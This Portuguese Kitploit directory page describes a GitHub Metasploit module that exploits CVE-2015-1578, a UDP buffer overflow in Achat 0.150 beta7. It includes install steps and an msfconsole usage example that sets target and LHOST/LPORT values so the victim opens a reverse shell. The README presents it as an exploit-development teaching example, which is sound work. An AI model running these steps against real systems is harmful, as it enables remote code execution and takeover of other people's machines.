Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2015-1578-PoC-Metasploit — Este é um exploit de módulo Metasploit de prova de conceito para CVE-2015-1578, uma vulnerabilidade de estouro de buffer no Achat 0.150 beta7 no Windows. A exploração leva à execução remota de código por meio de um pacote UDP forjado. | Kitploit
Ferramentas/GitHubGitHub/yaldobaoth/cve-2015-1578-poc-metasploit
Frameworks de Testes de PenetraçãoFrameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoShellcodeFerramenta de Acesso RemotoGeração de ShellcodeDesenvolvimento de PayloadsExploração de Binários
GitHubyaldobaoth/cve-2015-1578-poc-metasploit

CVE-2015-1578-PoC-Metasploit

Este é um exploit de módulo Metasploit de prova de conceito para CVE-2015-1578, uma vulnerabilidade de estouro de buffer no Achat 0.150 beta7 no Windows. A exploração leva à execução remota de código por meio de um pacote UDP forjado.

Ver Repositório
13há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Módulo Metasploit para CVE-2015-1578

Visão Geral

Este é um módulo do Metasploit para CVE-2015-1578, uma vulnerabilidade de estouro de buffer em Achat 0.150 beta7 no Windows. A exploração leva à execução remota de código por meio de um pacote UDP malicioso.

Objetivo

Este módulo foi desenvolvido para servir como um exemplo limpo, mínimo e bem estruturado de desenvolvimento de exploits para o Metasploit. Ele demonstra:

  • Geração dinâmica de shellcode codificado em Unicode via msfvenom
  • Injeção manual de payload (contornando o codificador interno de payload do Metasploit)
  • Mecanismo simples de entrega baseado em UDP
  • Integração com o Metasploit Framework usando carregamento de módulos personalizado

Tutorial em Vídeo

Tutorial em Vídeo

Dependências

  • Metasploit Framework
  • msfvenom no seu
$PATH

Recursos

  • Usa msfvenom para gerar payload com codificação x86/unicode_mixed e caracteres inválidos personalizados
  • Evita o sistema de codificação de payload embutido do Metasploit para contornar as limitações do codificador

Instalação

root@kitploit:~
./install.sh

Em seguida, inicie o Metasploit e execute:

root@kitploit:~
reload_all
use exploit/windows/yaldobaoth/achat_bof

Opções

  • RHOSTS – Endereço IP do alvo (obrigatório)
  • LHOST – IP do host local para o reverse shell (obrigatório)
  • LPORT – Porta local para o reverse shell (padrão: 4444)
  • RPORT – Porta UDP remota no alvo (padrão: 9256)

Exemplo de Uso

root@kitploit:~
msfconsole
use exploit/windows/yaldobaoth/achat_bof
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run

Isto irá:

  • Gerar um payload de reverse shell compatível com Unicode com o msfvenom
  • Injetá-lo no buffer vulnerável do Achat via UDP
  • Aguardar o shell no LHOST:LPORT especificado
Baixar ferramenta